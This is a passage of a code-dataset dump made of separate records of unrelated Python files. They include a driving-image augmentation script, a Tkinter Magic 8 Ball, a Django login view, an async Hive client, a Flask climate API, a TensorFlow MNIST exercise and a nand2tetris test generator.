Dropout\n\n\n\n#%%\nlines = []\nwith open( \"/Users/Arash/GitHub/CarND-Behavioral-Cloning-P3/data/driving_log.csv\" ) as csvfile:\n reader = csv.reader( csvfile )\n for line in reader:\n lines.append( line )\n\nimagesC = []\nimagesL = []\nimagesR = []\nmeasurmentsC = []\nmeasurmentsL = []\nmeasurmentsR = []\nfor line in lines:\n image = cv2.imread( line[ 0 ] )\n imagef = cv2.flip(image,1)\n imagesC.append( image )\n imagesC.append(imagef)\n\n image = cv2.imread(line[1])\n imagef = cv2.flip(image, 1)\n imagesL.append(image)\n imagesL.append(imagef)\n\n image = cv2.imread(line[2])\n imagef = cv2.flip(image,1)\n imagesR.append(image)\n imagesR.append(imagef)\n\n measurment = float( line[ 3 ] )\n '''if measurment == 0:\n measurment = measurment+np.random.rand(1)'''\n measurmentsC.append( measurment )\n measurmentsC.append( -measurment)\n\n measurmentl = measurment+.2\n measurmentsL.append( measurmentl)\n measurmentsL.append(-measurmentl)\n\n measurmentr = measurment-.2\n measurmentsR.append( measurmentr)\n measurmentsR.append(-measurmentr)\n\n'''\nX_train = np.array( images )\ny_train = np.array( measurments )\n'''\nimagesC = np.array(imagesC)\nimagesR = np.array(imagesR)\nimagesL = np.array(imagesL)\n\nimages = []\nimages.extend(imagesC)\nimages.extend(imagesL)\nimages.extend(imagesR)\n\nmeasurmentsC_before =measurmentsC\nmeasurmentsC = np.array(measurmentsC)\nmeasurmentsC[measurmentsC==0] = measurmentsC[measurmentsC==0]+(.0001*np.random.randn(measurmentsC[measurmentsC==0].shape[0]))\n\n\n\nmeasurmentsR_before =measurmentsR\nmeasurmentsR = np.array(measurmentsR)\nmeasurmentsR[measurmentsR==-.2] = measurmentsR[measurmentsR==-.2]+(.0001*np.random.randn(measurmentsR[measurmentsR==-.2].shape[0]))\n\nmeasurmentsL_before =measurmentsL\nmeasurmentsL = np.array(measurmentsL)\nmeasurmentsL[measurmentsL==.2] = measurmentsL[measurmentsL==.2]+(.0001*np.random.randn(measurmentsL[measurmentsL==.2].shape[0]))\n\n\nmeasurments = []\nmeasurments.extend(measurmentsC)\nmeasurments.extend(measurmentsL)\nmeasurments.extend(measurmentsR)\n\nmeasurments_before = []\nmeasurments_before.extend(measurmentsC_before)\nmeasurments_before.extend(measurmentsL_before)\nmeasurments_before.extend(measurmentsR_before)\n\nplt.figure( \"Histogram\", figsize = (13,8) )\nplt.subplot(1,3,1)\nplt.title(\"Center Camera\")\nplt.hist(measurmentsC)#, np.arange(-1,1,.25))\nplt.ylim(0,12000)\nplt.subplot(1,3,2)\nplt.title(\"Added side cameras\")\nplt.hist( measurments_before)#, np.arange(-1,1,.25))\nplt.ylim(0,12000)\nplt.subplot(1,3,3)\nplt.title(\"Added white noise\")\nplt.hist(measurments)#, np.arange(-1,1,.25))\nplt.ylim(0,12000)\nplt.show()\n\nsmpl_im = np.random.randint( 0, len( imagesC ) )\nplt.figure( \"raw image\")\nplt.subplot( 2, 3, 2 )\nplt.title( \"Center\" )\nplt.imshow( np.array(imagesC[ smpl_im, :, :, : : -1 ]) )\nplt.subplot( 2, 3, 1 )\nplt.title( \"Left\" )\nplt.imshow( np.array(imagesL[ smpl_im, :, :, : : -1 ]) )\nplt.subplot( 2, 3, 3 )\nplt.title( \"Right\" )\nplt.imshow( np.array(imagesR[ smpl_im, :, :, : : -1 ]) )\n\nplt.subplot( 2, 3, 5 )\nplt.title( \"Flipped Center\" )\nflp = np.array(cv2.flip(imagesC[ smpl_im, :, :, :],1))\nplt.imshow( np.array(flp[ :, :, : : -1 ]) )\nplt.subplot( 2, 3, 4 )\nplt.title( \"Flipped Left\" )\nflp = np.array(cv2.flip(imagesL[ smpl_im, :, :, :],1))\nplt.imshow( np.array(flp[ :, :, : : -1 ]) )\nplt.subplot( 2, 3, 6 )\nplt.title( \"Flipped Right\" )\nflp = np.array(cv2.flip(imagesR[ smpl_im, :, :, :],1))\nplt.imshow( np.array(flp[ :, :, : : -1 ]) )\nplt.show()\n\n#X_train = X_train[ :, 45 : 135,:,: ]\n\nplt.figure( \"Cropped image\")\nplt.subplot( 1, 3, 2 )\nplt.title( \"Center\" )\nplt.imshow( imagesC[ smpl_im, 75 : 135, :, : : -1 ])\nplt.subplot( 1, 3, 1 )\nplt.title( \"Left\" )\nplt.imshow( imagesL[ smpl_im, 75 : 135, :, : : -1 ])\nplt.subplot( 1, 3, 3 )\nplt.title( \"Right\" )\nplt.imshow( imagesR[ smpl_im, 75 : 135, :, : : -1 ])\nplt.show()\n\n\ny_train = np.array(measurments)\nX_train = np.array(images)\n#%% Model\n'''model=Sequential()\nmodel.add(Lambda(lambda x:x/255.0-0.5, input_shape=(160,320,3),output_shape=(160,320,3)))\nmodel.add(Cropping2D(cropping=((45,15),(0,0))))\nmodel.add(Convolution2D(24,5,5,subsample=(2,2),activation='elu'))\nmodel.add(Convolution2D(36,5,5,subsample=(2,2),activation='elu'))\nmodel.add(Convolution2D(48,5,5,subsample=(2,2),activation='elu'))\nmodel.add(Convolution2D(64,3,3,activation='elu'))\nmodel.add(Convolution2D(64,3,3,activation='elu'))\nmodel.add(Flatten())\n#model.add(Dense(1164))\nmodel.add(Dense(100))\nmodel.add(Dropout(0.6))\nmodel.add(Dense(50))\nmodel.add(Dropout(0.6))\nmodel.add(Dense(10))\nmodel.add(Dense(1))\n\n\n\n\nmodel.compile(loss='mse', optimizer = 'adam')\nmodel.fit(X_train,y_train, validation_split = 0.2, shuffle = True, nb_epoch = 2)\n\nfrom keras.models import Model\n\nprint (\"Training the model ...\")\nhistory = model.fit(X_train, y_train, batch_size=batch_size, nb_epoch=nb_epoch, verbose=2, \\\n callbacks=outputs, validation_data=(X_validation, y_validation), shuffle=False)\n\nprint(\"Plotting losses ... \")\nplot(model, to_file='model.png')\n\n# list all data in history\nprint(history.history.keys())\n\n# summarize history for loss\nplt.plot(history.history['loss'])\nplt.plot(history.history['val_loss'])\nplt.title('model loss')\nplt.ylabel('loss')\nplt.xlabel('epoch')\nplt.legend(['train', 'test'], loc='upper left')\nplt.show()\n\n\n\nmodel.save('model.h5')\nprint('done')\nlos'''\n'''t = [0.0344,0.0254,.0225,0.0210,0.0200,0.0194,0.0188,0.0183,0.0179,0.0175]\nv = [0.0275,0.0238,0.0220,0.0210,0.0204,0.0197,0.0194,0.0191,.0188,0.0186]\nplt.figure()\nplt.plot(t)\nplt.plot(v)\nplt.title('model loss')\nplt.ylabel('loss')\nplt.xlabel('epoch')\nplt.legend(['train', 'test'], loc='upper left')\nplt.show()'''\n","sub_path":"developing pipelines and prototype codes/devs.py","file_name":"devs.py","file_ext":"py","file_size_in_byte":5957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"374607952","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n#!/usr/bin/env python\n\nimport random\nimport Tkinter # note use of caps\nfrom Tkinter import *\n\t\n\n#set up\nwindow = Tk()\nwindow.title('Magic 8')\nwindow.geometry(\"300x100\") #wxh\nwindow.resizable(0,0)\n\n\nRESPONSES = [\"It is certain\",\n \"It is decidedly so\",\n \"Without a doubt\",\n \"Yes definitely\",\n \"You may rely on it\",\n \"As I see it yes\",\n \"Most likely\",\n \"Outlook good\",\n \"Yes\",\n \"Signs point to yes\",\n \"Reply hazy try again\",\n \"Ask again later\",\n \"Better not tell you now\",\n \"Cannot predict now\",\n \"Concentrate and ask again\",\n \"Don't count on it\",\n \"My reply is no\",\n \"My sources say no\",\n \"Outlook not so good\",\n \"Very doubtful\"] \n \ndef response():\n\tx = random.choice(RESPONSES)\n\t#print x\n\tcircletext2.delete(0, END) # clear prev output\n\tcircletext2.insert(0,str(x))\n \n#define labels - cannot share same name as function\nbox1 = Label(window, text=\"Question: \")\nbox2 = Label(window, text=\"Answer: \") \n\n#place labels\nbox1.grid(row = 1, column = 1, padx = 5, pady = 5)\nbox2.grid(row = 2, column = 1, padx = 5, pady = 5)\n\n#define entry box \n\ncircleVar = StringVar()\ncircletext = Entry(window, textvariable=circleVar)\n\n#define out box \n\ncircleVar2 = StringVar()\ncircletext2 = Entry(window, textvariable=circleVar2)\n\n\n#display boxes\ncircletext.grid(row = 1, column = 2,)\ncircletext2.grid(row = 2, column = 2,)\n\n#define buttons\n\nresponse = Button( window, text ='respomse', command=response)\nexitbtn = Button( window, text ='Exit', command=exit)\n\n#place buttons\n\nresponse.grid(row = 4, column = 1, padx = 1, pady = 1)\nexitbtn.grid(row = 4, column = 2, padx = 1, pady = 1)\n\n#display window\n\nwindow.mainloop()\n\n\n#while(True):\n# raw_input(\"Enter your question: \")\n \n","sub_path":"gui_demos/magic8-GUI.py","file_name":"magic8-GUI.py","file_ext":"py","file_size_in_byte":1966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"633959669","text":"from django.shortcuts import render\r\n\r\n# Create your views here.\r\ndef index(req):\r\n return render(req, 'form.html')\r\n\r\ndef login(req):\r\n username = \"\"\r\n\r\n errors = []\r\n\r\n if 'username' in req.POST:\r\n username = req.POST['username']\r\n\r\n if not username:\r\n errors.append(\"Please fill this field\")\r\n elif len(username) < 10:\r\n errors.append(\"Should be greater than 10\")\r\n\r\n else:\r\n return render(req, 'login.html', {'username' : username})\r\n\r\n\r\n return render(req, 'form.html', {\"errors\" : errors})","sub_path":"tutorial/ajax_call/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"19100804","text":"import asyncio\nimport aiohs2\nimport pandas as pd\n\nfrom functools import wraps\ncoroutine = asyncio.coroutine\n\nclass AioHive:\n def __init__(self, host, port=10000):\n \"\"\"\n coroutine based hive client\n\n Parameters\n ==========\n host : str\n host of the hiveserver2 to connect to\n port : int, default 10000\n port of the hiveserver2\n \"\"\"\n self.cli = aiohs2.Client(host=host, port=port)\n\n def execute(self, request):\n \"\"\" execute request without looking at returns \"\"\"\n cur = yield from self.cli.cursor()\n try:\n yield from cur.execute(request)\n finally:\n yield from cur.close()\n\n def fetch(self, hql, chunk_size=10000):\n \"\"\" execute request and fetch answer as DataFrame \"\"\"\n cur = yield from self.cli.cursor()\n try:\n yield from cur.execute(hql)\n schema = yield from cur.getSchema()\n columns = pd.Index([nfo['columnName'] for nfo in schema])\n\n return pd.DataFrame((yield from cur.fetch(maxRows=chunk_size)) or None, columns=columns)\n finally:\n yield from cur.close()\n\n def iter(self, hql, chunk_size=10000):\n \"\"\" execute request and iterate over chunks of resulting DataFrame \"\"\"\n cur = yield from self.cli.cursor()\n\n try:\n yield from cur.execute(hql)\n schema = yield from cur.getSchema()\n columns = pd.Index([nfo['columnName'] for nfo in schema])\n\n chunks = cur.iter(maxRows=chunk_size)\n\n class local:\n offset=0\n empty=None\n\n @coroutine\n def to_frame(chunk_co):\n data = pd.DataFrame((yield from chunk_co) or local.empty, columns=columns)\n data.index += local.offset\n\n local.offset += len(data)\n if local.empty is None:\n local.empty = data[:0].copy()\n return data\n\n def closing():\n try:\n for chunk in chunks:\n # here we yield the coroutine that will fetch the data and put in in a frame\n yield to_frame(chunk)\n finally:\n # while ensuring that the cursor is closed after the request is done ....\n cur.close()\n\n return closing()\n\n except:\n cur.close()\n raise\n\nclass SyncedHive:\n def __init__(self, *args, hive=None, **kws):\n \"\"\"\n synced wrapper around the asyncio hive class\n\n Parameters\n ==========\n host : str\n host of the hiveserver2 to connect to\n port : int, default 10000\n port of the hiveserver2\n hive : AioHive, optional\n existing async hive client\n \"\"\"\n self.hive = hive or AioHive(*args, **kws)\n self.loop = asyncio.get_event_loop()\n\n def run(self, coro):\n return self.loop.run_until_complete(coro)\n\n def synced(name):\n func = getattr(AioHive, name)\n @wraps(func)\n def synced(self, *args, **kws):\n return self.run(func(self.hive, *args, **kws))\n return synced\n\n execute = synced('execute')\n fetch = synced('fetch')\n\n def iter(self, *args, **kws):\n for chunk in self.run(self.hive.iter(*args, **kws)):\n data = self.run(chunk)\n if not data.empty:\n yield data\n\nHive = SyncedHive\n","sub_path":"hive/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"422605341","text":"from flask import Flask, json, jsonify\nfrom sqlalchemy.orm import Session\nfrom sqlalchemy.ext.automap import automap_base\nfrom sqlalchemy import create_engine, func\nimport datetime as dt\nimport numpy as np\n\n\nengine = create_engine(\"sqlite:///titanic.sqlite\")\n\n#################################################\n# Database Setup\n#################################################\nengine = create_engine(\"sqlite:///hawaii.sqlite\")\n\n# reflect an existing database into a new model\nBase = automap_base()\n# reflect the tables\nBase.prepare(engine, reflect=True)\n\n# Save reference to the table\nMeasurement = Base.classes.measurement\nStation = Base.classes.station\n\n\n#################################################\n# Flask Setup\n#################################################\napp = Flask(__name__)\n\n\n#################################################\n# Flask Routes\n#################################################\n@app.route(\"/\")\ndef home():\n return (\n f\"Available Routes:
\"\n f\"/api/v1.0/precipitation
\"\n f\"/api/v1.0/stations
\"\n f\"/api/v1.0/tobs
\"\n f\"/api/v1.0/2017-08-20
\"\n f\"/api/v1.0/2017-08-17/2017-08-20
\"\n )\n\n@app.route(\"/api/v1.0/precipitation\")\ndef prcp():\n\n session = Session(engine)\n \n # Find the most recent date in the data set.\n recent_date = session.query(Measurement.date).order_by(Measurement.date.desc()).first()\n\n # Calculate the date one year from the last date in data set.\n year_ago = dt.datetime(2017,8,23)- dt.timedelta(days = 365)\n\n # Perform a query to retrieve the data and precipitation scores\n results = session.query(Measurement.date, Measurement.prcp).\\\n filter(Measurement.date >= year_ago).\\\n order_by(Measurement.date).all()\n\n dates = [result[0] for result in results]\n prcps = [result[1] for result in results]\n\n # Save the query results in a dictionary - keys=dates and values=prcps\n prcp_dict = dict(zip(dates, prcps))\n precip = {date: prcp for date, prcp in results}\n return jsonify(prcp_dict)\n\n@app.route(\"/api/v1.0/stations\")\ndef stations():\n session = Session(engine)\n\n results = session.query(Station.station).all()\n\n all_stations = list(np.ravel(results))\n\n return jsonify(all_stations)\n\n@app.route(\"/api/v1.0/tobs\")\ndef tobs():\n session = Session(engine)\n\n year_ago = dt.datetime(2017,8,23)- dt.timedelta(days = 365)\n\n # Design a query to find the most active stations (i.e. what stations have the most rows?)\n # List the stations and the counts in descending order.\n observation_counts = session.query(Measurement.station, func.count(Measurement.station)).\\\n group_by(Measurement.station).\\\n order_by(func.count(Measurement.station).desc()).all()\n\n most_active_station = observation_counts[0][0]\n \n # Query the last 12 months of tobs data for this station and plot the results as a histogram\n results = session.query(Measurement.date, Measurement.tobs).\\\n filter(Measurement.date >= year_ago).\\\n filter(Measurement.station == most_active_station).\\\n order_by(Measurement.date).all()\n\n dates = [result[0] for result in results]\n temps = [result[1] for result in results]\n\n # Save the query results in a dictionary - keys=dates and values=temps\n prcp_dict = dict(zip(dates, temps))\n \n return jsonify(prcp_dict)\n\n@app.route(\"/api/v1.0/\")\ndef start_tobs(start):\n \n session = Session(engine)\n\n min = session.\\\n query(func.min(Measurement.tobs)).\\\n filter(Measurement.date >= start).first()\n max = session.\\\n query(func.max(Measurement.tobs)).\\\n filter(Measurement.date >= start).first()\n avg = session.\\\n query(func.avg(Measurement.tobs)).\\\n filter(Measurement.date >= start).first()\n\n list= [min[0], max[0], avg[0]]\n return jsonify(list)\n\n@app.route(\"/api/v1.0//\")\ndef start__end_tobs(start, end):\n \n session = Session(engine)\n\n min = session.\\\n query(func.min(Measurement.tobs)).\\\n filter(Measurement.date >= start).filter(Measurement.date <= end).first()\n max = session.\\\n query(func.max(Measurement.tobs)).\\\n filter(Measurement.date >= start).filter(Measurement.date <= end).first()\n avg = session.\\\n query(func.avg(Measurement.tobs)).\\\n filter(Measurement.date >= start).filter(Measurement.date <= end).first()\n\n list= [min[0], max[0], avg[0]]\n return jsonify(list)\n\n\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n","sub_path":"climate_app.py","file_name":"climate_app.py","file_ext":"py","file_size_in_byte":4519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"507254603","text":"\n# coding: utf-8\n\n# CSDN AI 挑战课 任务一:\n# 改动的部分有:\n# 隐层层数由1改成2, 隐层节点数由100增加到300\n# 初始化参数 stddev 由0.05,0.05,0.063改成0.1,0.1,0.08\n# 损失函数增加了l2正则化, 惩罚因子0.00003\n# 学习率改为动态调整,初始学习率改为0.5, decay_rate=0.91, decay_step=200\n# 最后经群里大佬指点把源代码评分部分第二个if改成elif(一个小bug)\n# 最终跑的效果正确率0.98出头, 以下内容从tinymind直接导出\n\n# 这个作业中,我们使用tensorflow来实现一个简单的手写数字识别的全连接网络,并用这个网络来做个\n# 简单的识别示例。\n# \n# 本作业中,需要参与者应用视频中学到的知识:dropout,learingratedecay,初始化等等,将网络最终在validation数据上的得分尽可能的提高。\n# \n# - 准确率>=98% , 100分\n# - 98%>准确率>=96% , 60分\n# - 准确率<96% , 0分\n# \n\n# 首先导入一些用到的库。\n\n# In[1]:\n\n\nimport numpy as np\nimport tensorflow as tf\nfrom tensorflow.examples.tutorials.mnist import input_data\nfrom matplotlib import pyplot as plt\n\nget_ipython().run_line_magic('matplotlib', 'inline')\n\ntf.logging.set_verbosity(tf.logging.INFO)\n\n\n# 先来看看数据长什么样子\n\n# In[2]:\n\n\nmnist = input_data.read_data_sets(\"./\")\n\nprint(mnist.train.images.shape)\nprint(mnist.train.labels.shape)\n\nprint(mnist.validation.images.shape)\nprint(mnist.validation.labels.shape)\n\nprint(mnist.test.images.shape)\nprint(mnist.test.labels.shape)\n\n\n# 可以看到images里面有数量不等的图片,每张图片是28x28长度的一个一维向量,\n# 所以用的时候需要先给它还原成28x28的二维图片。labels中则是图片对应的数字的值。\n\n# In[3]:\n\n\nplt.figure(figsize=(8,8))\n\nfor idx in range(16):\n plt.subplot(4,4, idx+1)\n plt.axis('off')\n plt.title('[{}]'.format(mnist.train.labels[idx]))\n plt.imshow(mnist.train.images[idx].reshape((28,28)))\n\n\n# 接下来,定义用于训练的网络,首先定义网络的输入。\n# \n# 这里我们直接使用上面的数据作为输入,所以定义两个placeholder分别用于图像和lable数据,另外,定义一个float类型的变量用于设置学习率。\n# \n# 为了让网络更高效的运行,多个数据会被组织成一个batch送入网络,两个placeholder的第一个维度就是batchsize,因为我们这里还没有确定batchsize,所以第一个维度留空。\n\n# In[4]:\n\n\nx = tf.placeholder(\"float\", [None, 784])\ny = tf.placeholder(\"int64\", [None])\nlearning_rate = tf.placeholder(\"float\")\n\n\n# In[10]:\n\n\ndef initialize(shape, stddev=0.1):\n return tf.truncated_normal(shape, stddev=0.1)\n\nL1_units_count = 300\n\nW_1 = tf.Variable(initialize([784, L1_units_count], stddev=0.1))\nb_1 = tf.Variable(initialize([L1_units_count]))\nlogits_1 = tf.matmul(x, W_1) + b_1\noutput_1 = tf.nn.relu(logits_1)\n\nW_1_x = tf.Variable(initialize([L1_units_count, L1_units_count], stddev=0.1))\nb_1_x = tf.Variable(initialize([L1_units_count]))\nlogits_1_x = tf.matmul(output_1, W_1_x) + b_1_x\noutput_1_x = tf.nn.relu(logits_1_x)\n\nL2_units_count = 10 \nW_2 = tf.Variable(initialize([L1_units_count, L2_units_count], stddev=0.08))\nb_2 = tf.Variable(initialize([L2_units_count]))\nlogits_2 = tf.matmul(output_1_x, W_2) + b_2 \n\nlogits = logits_2\n\n\n# 接下来定义loss和用于优化网络的优化器。loss计算使用了sparse_softmax_cross_entropy_with_logits,\n# 这样做的好处是labels可以不用手动做one_hot省了一些麻烦。这里使用了sgd优化器,学习率为可以根据需要设定。\n# \n# >试试看,增大减小学习率,换个优化器再进行训练会发生什么。\n\n# In[11]:\n\n\ncross_entropy_loss = tf.reduce_mean(\n tf.nn.sparse_softmax_cross_entropy_with_logits(logits=logits, labels=y))\\\n + tf.nn.l2_loss(W_1)*0.00003\n# + tf.contrib.layers.l2_regularizer(0.000001)(W_2)\n\noptimizer = tf.train.GradientDescentOptimizer(\n learning_rate=learning_rate).minimize(cross_entropy_loss)\n\n\n# 需要注意的是,上面的网络,最后输出的是未经softmax的原始logits,而不是概率分布,\n# 要想看到概率分布,还需要做一下softmax。\n# \n# 将输出的结果与正确结果进行对比,即可得到我们的网络输出结果的准确率。\n\n# In[12]:\n\n\npred = tf.nn.softmax(logits)\ncorrect_pred = tf.equal(tf.argmax(pred, 1), y)\naccuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))\n\n\n# saver用于保存或恢复训练的模型。\n\n# In[13]:\n\n\nbatch_size = 32\ntrainig_step = 6000\n\nsaver = tf.train.Saver()\n\n\n# 以上定义的所有操作,均为计算图,也就是仅仅是定义了网络的结构,实际需要运行的话,还需要创建一个session,并将数据填入网络中。\n\n# In[16]:\n\n\nwith tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n\n #定义验证集与测试集\n validate_data = {\n x: mnist.validation.images,\n y: mnist.validation.labels,\n }\n test_data = {x: mnist.test.images, y: mnist.test.labels}\n\n for i in range(trainig_step):\n xs, ys = mnist.train.next_batch(batch_size)\n _, loss = sess.run(\n [optimizer, cross_entropy_loss],\n feed_dict={\n x: xs,\n y: ys,\n learning_rate: 0.5*0.91**(i/200)\n })\n\n #每100次训练打印一次损失值与验证准确率\n if i > 0 and i % 100 == 0:\n validate_accuracy = sess.run(accuracy, feed_dict=validate_data)\n print(\n \"after %d training steps, the loss is %g, the validation accuracy is %g\"\n % (i, loss, validate_accuracy))\n saver.save(sess, './model.ckpt', global_step=i)\n\n print(\"the training is finish!\")\n #最终的测试准确率\n acc = sess.run(accuracy, feed_dict=test_data)\n print(\"the test accuarcy is:\", acc)\n\nif validate_accuracy >=0.98:\n score = 100\nelif validate_accuracy >=0.96 and validate_accuracy <0.98 :\n score = 60\nelse:\n score = 0\nprint('#'*10)\nprint('Your validate_accuracy:[{}]'.format(validate_accuracy))\nprint('Your final score:[{}]'.format(score))\nprint('#'*10)\n\n\n# 下面,用我们训练的模型做一个测试。\n\n# In[17]:\n\n\nwith tf.Session() as sess:\n ckpt = tf.train.get_checkpoint_state('./')\n if ckpt and ckpt.model_checkpoint_path:\n saver.restore(sess, ckpt.model_checkpoint_path)\n final_pred, acc = sess.run(\n [pred, accuracy],\n feed_dict={\n x: mnist.test.images[:16],\n y: mnist.test.labels[:16]\n })\n orders = np.argsort(final_pred)\n plt.figure(figsize=(8, 8))\n print(acc)\n for idx in range(16):\n order = orders[idx, :][-1]\n prob = final_pred[idx, :][order]\n plt.subplot(4, 4, idx + 1)\n plt.axis('off')\n plt.title('{}: [{}]-[{:.1f}%]'.format(mnist.test.labels[idx],\n order, prob * 100))\n plt.imshow(mnist.test.images[idx].reshape((28, 28)))\n\n else:\n pass\n\n\n# 以作业提供的参数运行出来的结果,只看上面几个数字还是很不错的,但是总体准确率不太理想。\n","sub_path":"MNIST Full Connection.py","file_name":"MNIST Full Connection.py","file_ext":"py","file_size_in_byte":7206,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"428870192","text":"import pygame\nfrom pygame.locals import *\nimport Ferramentas_menu2 as ferramentas2\nimport menu\n\npygame.init() #inicia o pygame\n\n#cores\nvermelho = [255,0,0]\npreto = [0, 0, 0]\n\ntamanho = largura, altura = (700, 460) #tamanho da tela\npygame.display.set_caption('COBRINHA SHOW') # mensagem no topo da tela\ntela = pygame.display.set_mode(tamanho)\n\nimagem_fundo = 'ajuda.jpg' #imagem de fundo\nimagem = pygame.image.load(imagem_fundo).convert()\nclock = pygame.time.Clock()\n\ndef ajuda(): #função de ajuda do jogo\n\n while True:\n for event in pygame.event.get():\n if event.type == QUIT:\n exit()\n tela.blit(imagem, (0, 0))\n pygame.display.update()\n\n #opçõe de volta ao menu principal\n cursor3 = ferramentas2.fer_menu2(tela, ['VOLTAR'], 30, 425, None, 30, 1.4, preto, vermelho)\n\n if cursor3 == 0: #se a opção escolhida for 0, volta ao menu principal\n menu.menu_principal()\n\n exit()\n\n\n","sub_path":"Projeto_Algoritmos - IFPB/Jogo/Códigos/menu3.py","file_name":"menu3.py","file_ext":"py","file_size_in_byte":967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"377227766","text":"import random\nfrom itertools import product\n\nselect_list = [''.join(b) for b in product('01', repeat=3)] # get strings of length 3 of all permutations of '01'\n\ncmp = open(\"Mux8Way16.cmp\", 'w')\ntst = open(\"Mux8Way16.tst\", 'w')\ncmp.write(\"| a | b | c | d | e | f | g | h | sel | out |\\n\")\ntst.write(\n'''// Author: A: Matthew Kovar\n// This test is not exhaustive; it tests the scenario in which all inputs are identical and other scenarios in which inputs are almost certainly not identical\n// Given that each 16 bit input was chosen at random, the chance that any two of them match is extremely small\nload Mux8Way16.hdl,\noutput-file Mux8Way16.out,\ncompare-to Mux8Way16.cmp,\noutput-list a%B1.16.1 b%B1.16.1 c%B1.16.1 d%B1.16.1 e%B1.16.1 f%B1.16.1 g%B1.16.1 h%B1.16.1 sel%B2.3.2 out%B1.16.1;\n\n'''\n)\n\n# all inputs are the same\nfor j, sel in enumerate(select_list):\n a = '0'*16\n out = a\n cmp.write(\"| {} | {} | {} | {} | {} | {} | {} | {} | {} | {} |\\n\".format(a, a, a, a, a, a, a, a, sel, out))\n tst.write('set {} %B{},\\n'.format(chr(j+97), a))\ntst.write(\"\\n\")\nfor i in range(8):\n tst.write('''set sel {}, eval, output;\\n'''.format(i))\ntst.write(\"\\n\")\n\n# all inputs are (most likely) different\nfor i in range(int(256/8) - 1): # test 8 inputs at a time\n all = [''.join([random.choice('01') for k in range(16)]) for l in range(8)] # all 16 bit inputs {a, b, c, d, e, f, g, h}\n for j, sel in enumerate(select_list):\n out = all[int(sel, 2)] # convert binary to decimal and access by index\n cmp.write(\"| {} | {} | {} | {} | {} | {} | {} | {} | {} | {} |\\n\".format(all[0], all[1], all[2], all[3], all[4], all[5], all[6], all[7], sel, out))\n for k, kval in enumerate(all):\n tst.write('set {} %B{},\\n'.format(chr(k+97), kval)) # set {letter} %B{16 bit input value}\n tst.write(\"\\n\")\n for k in range(8):\n tst.write('''set sel {}, eval, output;\\n'''.format(k))\n tst.write(\"\\n\")\ntst.close()\ncmp.close()","sub_path":"test_generator/Mux8Way16.py","file_name":"Mux8Way16.py","file_ext":"py","file_size_in_byte":2047,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"483600597","text":"# -*- coding: utf-8 -*-\n\nimport os\n\nsettings_dir = os.path.abspath(os.path.dirname(__file__))\n\n# Dummy function, so that \"makemessages\" can find strings which should be translated.\n_ = lambda s: s\n\nDEBUG = True\nTEMPLATE_DEBUG = DEBUG\n\n# A tuple that lists people who get code error notifications. When\n# DEBUG=False and a view raises an exception, Django will e-mail these\n# people with the full exception information. Each member of the tuple\n# should be a tuple of (Full name, e-mail address).\nADMINS = (\n)\n\nMANAGERS = ADMINS\n\nDATABASES = {\n 'default': {\n# 'ENGINE': 'django.db.backends.sqlite3',\n# 'NAME': 'db.sqlite',\n 'ENGINE': 'django.db.backends.postgresql_psycopg2', # Add 'postgresql_psycopg2', 'postgresql', 'mysql', 'sqlite3' or 'oracle'.\n 'NAME': 'wlansi', # Or path to database file if using sqlite3.\n 'USER': 'wlansi_cms', # Not used with sqlite3.\n 'PASSWORD': '', # Not used with sqlite3.\n 'HOST': '', # Set to empty string for localhost. Not used with sqlite3.\n 'PORT': '', # Set to empty string for default. Not used with sqlite3.\n },\n}\n\n# Local time zone for this installation. Choices can be found here:\n# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name\n# although not all choices may be available on all operating systems.\n# On Unix systems, a value of None will cause Django to use the same\n# timezone as the operating system.\n# If running in a Windows environment this must be set to the same as your\n# system time zone.\nTIME_ZONE = 'Europe/Ljubljana'\n\n# Language code for this installation. All choices can be found here:\n# http://www.i18nguy.com/unicode/language-identifiers.html\nLANGUAGE_CODE = 'sl'\n\nLANGUAGES = (\n ('sl', _('Slovenian')),\n ('en', _('English')),\n)\n\nADMIN_LANGUAGE_CODE = 'en'\n\nimport frontend\nGEOIP_PATH = os.path.abspath(os.path.join(os.path.dirname(frontend.__file__), '..', 'geoip'))\nDEFAULT_COUNTRY = 'SI'\n\nURL_VALIDATOR_USER_AGENT = 'Django'\n\n# Date input formats below take as first argument day and then month in x/y/z format\nDATE_INPUT_FORMATS = (\n '%Y-%m-%d', '%d/%m/%Y', '%d/%m/%y', '%b %d %Y',\n '%b %d, %Y', '%d %b %Y', '%d %b, %Y', '%B %d %Y',\n '%B %d, %Y', '%d %B %Y', '%d %B, %Y',\n)\n\n# All those formats are only defaults and are localized for users\nDATE_FORMAT = 'd/M/Y'\nTIME_FORMAT = 'H:i'\nDATETIME_FORMAT = 'd/M/Y, H:i'\nYEAR_MONTH_FORMAT = 'F Y'\nMONTH_DAY_FORMAT = 'j F'\nSHORT_DATE_FORMAT = 'd/m/y'\nSHORT_DATETIME_FORMAT = 'd/m/y H:i'\nFIRST_DAY_OF_WEEK = 1\nDECIMAL_SEPARATOR = '.'\nTHOUSAND_SEPARATOR = ','\nNUMBER_GROUPING = 0\n\n# We override defaults\nFORMAT_MODULE_PATH = 'mainpage.formats'\n\nFORCE_SCRIPT_NAME = ''\n\nAUTH_PROFILE_MODULE = 'account.UserProfileAndSettings'\n\nSITE_ID = 1\n\n# If you set this to False, Django will make some optimizations so as not\n# to load the internationalization machinery.\nUSE_I18N = True\n\n# If you set this to False, Django will not format dates, numbers and\n# calendars according to the current locale\nUSE_L10N = True\n\n# Absolute filesystem path to the directory that will hold 